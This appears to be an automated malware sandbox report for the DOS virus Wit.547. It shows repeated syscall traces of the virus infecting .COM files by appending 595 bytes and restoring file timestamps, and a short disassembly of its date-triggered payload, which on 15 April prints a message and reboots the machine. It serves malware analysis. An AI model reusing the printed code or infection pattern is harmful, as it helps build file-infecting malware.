Sample viewer

vx.netlux.org/Virus.DOS.Wit.547

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:12.759595571Z 26 PC: 12a71 | Set disk transfer address
2018-12-17T22:48:12.761094226Z 71 PC: 12a83 | Get current directory
2018-12-17T22:48:12.764671754Z 42 PC: 12a89 | Get date 0x12a89: cmp dh, 4
0x12a8c: jne 0x12aa7
0x12a8e: cmp dl, 0xf
0x12a91: jne 0x12aa7
0x12a93: mov ax, 0x1010
0x12a96: out 0x70, ax
0x12a98: mov dx, 0x2ee
0x12a9b: mov ah, 9
0x12a9d: int 0x21
0x12a9f: mov ah, 8
0x12aa1: int 0x21
0x12aa3: mov al, 0xfe
0x12aa5: out 0x64, al
0x12aa7: mov ah, byte ptr [0x318]
0x12aab: mov cl, 7
0x12aad: mov dx, 0x2e2
0x12ab0: int 0x21
0x12ab2: jae 0x12ab7
0x12ab4: jmp 0x12be0
0x12ab7: mov dx, word ptr [0x311]
2018-12-17T22:48:12.766968303Z 78 PC: 12ab2 | Find first file
2018-12-17T22:48:12.773714048Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:12.793028582Z 61 PC: 12ae2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:48:12.800526875Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:12.808010541Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:12.817667001Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:12.819427303Z 64 PC: 12b5b | Write file or device (Write 407 bytes on handle 5)
2018-12-17T22:48:12.82474565Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:12.827207578Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:12.835294234Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:12.837775342Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:12.848100882Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:12.859328518Z 79 PC: 12ab2 | Find next file
2018-12-17T22:48:12.862469955Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:12.873467515Z 61 PC: 12ae2 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:48:12.88113388Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:12.888823294Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:12.890733589Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:12.892737511Z 64 PC: 12b5b | Write file or device (Write 27 bytes on handle 5)
2018-12-17T22:48:12.897262955Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:12.898909232Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:12.907334859Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:12.909454213Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:12.918052345Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:12.929194707Z 79 PC: 12ab2 | Find next file
2018-12-17T22:48:12.932479946Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:12.943350679Z 61 PC: 12ae2 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:48:12.952263128Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:12.960038712Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:12.961770358Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:12.964606567Z 64 PC: 12b5b | Write file or device (Write 92 bytes on handle 5)
2018-12-17T22:48:12.969749907Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:12.972613393Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:12.981548715Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:12.983702793Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:12.992705677Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:13.004494111Z 79 PC: 12ab2 | Find next file
2018-12-17T22:48:13.007887741Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:13.019741686Z 61 PC: 12ae2 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:48:13.02716149Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:13.034953947Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:13.036534488Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:13.038120678Z 64 PC: 12b5b | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:48:13.044064824Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:13.046137609Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:13.055905113Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:13.058681041Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:13.067653794Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:13.078531856Z 79 PC: 12ab2 | Find next file
2018-12-17T22:48:13.082145364Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:13.094636989Z 61 PC: 12ae2 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:48:13.102477877Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:13.110672874Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:13.112266305Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:13.113924941Z 64 PC: 12b5b | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:48:13.118734848Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:13.120510461Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:13.128834499Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:13.130802448Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:13.140499209Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:13.151891571Z 59 PC: 12be9 | Change current directory
2018-12-17T22:48:13.157667418Z 26 PC: 12c06 | Set disk transfer address
2018-12-17T22:48:13.159976335Z 59 PC: 12c11 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9474,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:13.925736108Z 26 PC: 12a71 | Set disk transfer address
2018-12-25T12:23:13.927488123Z 71 PC: 12a83 | Get current directory
2018-12-25T12:23:13.931028576Z 42 PC: 12a89 | Get date 0x12a89: cmp dh, 4
0x12a8c: jne 0x12aa7
0x12a8e: cmp dl, 0xf
0x12a91: jne 0x12aa7
0x12a93: mov ax, 0x1010
0x12a96: out 0x70, ax
0x12a98: mov dx, 0x2ee
0x12a9b: mov ah, 9
0x12a9d: int 0x21
0x12a9f: mov ah, 8
0x12aa1: int 0x21
0x12aa3: mov al, 0xfe
0x12aa5: out 0x64, al
0x12aa7: mov ah, byte ptr [0x318]
0x12aab: mov cl, 7
0x12aad: mov dx, 0x2e2
0x12ab0: int 0x21
0x12ab2: jae 0x12ab7
0x12ab4: jmp 0x12be0
0x12ab7: mov dx, word ptr [0x311]
2018-12-25T12:23:13.933664626Z 78 PC: 12ab2 | Find first file
2018-12-25T12:23:13.940900208Z 67 PC: 12ace | Get or set file attributes
2018-12-25T12:23:13.965757315Z 61 PC: 12ae2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:23:13.973743743Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-25T12:23:13.98074226Z 66 PC: 12b1e | Move file pointer
2018-12-25T12:23:13.982976139Z 66 PC: 12b40 | Move file pointer
2018-12-25T12:23:13.984666761Z 64 PC: 12b5b | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:23:13.989048442Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:23:13.991023885Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-25T12:23:13.999045147Z 87 PC: 12bae | Get or set file date and time
2018-12-25T12:23:14.00067118Z 62 PC: 12bb4 | Close file
2018-12-25T12:23:14.009950551Z 67 PC: 12bc6 | Get or set file attributes
2018-12-25T12:23:14.02062633Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.023614164Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.035748882Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.043346906Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.050930386Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.053784123Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.058358878Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.062470882Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.064351426Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.073916527Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.075722716Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.083401379Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.095100644Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.098190463Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.109580078Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.117960083Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.125188009Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.127127272Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.129881673Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.134968127Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.136420328Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.145003025Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.146916417Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.155315658Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.167034252Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.17109896Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.183297179Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.191081731Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.19949022Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.201783814Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.203871813Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.210076921Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.211645097Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.220458676Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.22261543Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.227791589Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.234937703Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.237666972Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.244877936Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.249149853Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.254030452Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.255973684Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.257347168Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.26034323Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.262113203Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.267264999Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.26882844Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.277973384Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.28917378Z 59 PC: 12be9 | Change current directory
2018-12-25T12:23:14.299889415Z 26 PC: 12c06 | Set disk transfer address
2018-12-25T12:23:14.301815071Z 59 PC: 12c11 | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9474,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:14.115311028Z 26 PC: 12a71 | Set disk transfer address
2018-12-25T12:23:14.117151704Z 71 PC: 12a83 | Get current directory
2018-12-25T12:23:14.120494133Z 42 PC: 12a89 | Get date 0x12a89: cmp dh, 4
0x12a8c: jne 0x12aa7
0x12a8e: cmp dl, 0xf
0x12a91: jne 0x12aa7
0x12a93: mov ax, 0x1010
0x12a96: out 0x70, ax
0x12a98: mov dx, 0x2ee
0x12a9b: mov ah, 9
0x12a9d: int 0x21
0x12a9f: mov ah, 8
0x12aa1: int 0x21
0x12aa3: mov al, 0xfe
0x12aa5: out 0x64, al
0x12aa7: mov ah, byte ptr [0x318]
0x12aab: mov cl, 7
0x12aad: mov dx, 0x2e2
0x12ab0: int 0x21
0x12ab2: jae 0x12ab7
0x12ab4: jmp 0x12be0
0x12ab7: mov dx, word ptr [0x311]
2018-12-25T12:23:14.122889363Z 78 PC: 12ab2 | Find first file
2018-12-25T12:23:14.129795734Z 67 PC: 12ace | Get or set file attributes
2018-12-25T12:23:14.151859067Z 61 PC: 12ae2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:23:14.159886721Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-25T12:23:14.16744654Z 66 PC: 12b1e | Move file pointer
2018-12-25T12:23:14.170687176Z 66 PC: 12b40 | Move file pointer
2018-12-25T12:23:14.172642225Z 64 PC: 12b5b | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:23:14.177403545Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:23:14.180848415Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-25T12:23:14.194517913Z 87 PC: 12bae | Get or set file date and time
2018-12-25T12:23:14.196471593Z 62 PC: 12bb4 | Close file
2018-12-25T12:23:14.206152512Z 67 PC: 12bc6 | Get or set file attributes
2018-12-25T12:23:14.217965125Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.220908783Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.232910966Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.241308126Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.248406189Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.249747897Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.252058732Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.256481803Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.257710931Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.267033348Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.269158916Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.278690331Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.295328511Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.298462937Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.309575957Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.317311272Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.324678584Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.32639892Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.336643559Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.342528435Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.344247091Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.352581267Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.355083535Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.364686493Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.375691949Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.379728889Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.390877144Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.398385594Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.40739616Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.409032231Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.410625847Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.423215513Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.425281817Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.433933604Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.436222045Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.446066011Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.457022798Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.459891738Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.471156129Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.479218886Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.487214132Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.489109722Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.490582766Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.494426512Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.496483111Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.504526575Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.505677138Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.512268616Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.52321168Z 59 PC: 12be9 | Change current directory
2018-12-25T12:23:14.527735779Z 26 PC: 12c06 | Set disk transfer address
2018-12-25T12:23:14.529094592Z 59 PC: 12c11 | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9474,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:14.287814615Z 26 PC: 12a71 | Set disk transfer address
2018-12-25T12:23:14.29074646Z 71 PC: 12a83 | Get current directory
2018-12-25T12:23:14.293565887Z 42 PC: 12a89 | Get date 0x12a89: cmp dh, 4
0x12a8c: jne 0x12aa7
0x12a8e: cmp dl, 0xf
0x12a91: jne 0x12aa7
0x12a93: mov ax, 0x1010
0x12a96: out 0x70, ax
0x12a98: mov dx, 0x2ee
0x12a9b: mov ah, 9
0x12a9d: int 0x21
0x12a9f: mov ah, 8
0x12aa1: int 0x21
0x12aa3: mov al, 0xfe
0x12aa5: out 0x64, al
0x12aa7: mov ah, byte ptr [0x318]
0x12aab: mov cl, 7
0x12aad: mov dx, 0x2e2
0x12ab0: int 0x21
0x12ab2: jae 0x12ab7
0x12ab4: jmp 0x12be0
0x12ab7: mov dx, word ptr [0x311]
2018-12-25T12:23:14.295666678Z 9 PC: 12a9f | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T12:23:14.300604146Z 8 PC: 12aa3 | Console input without echo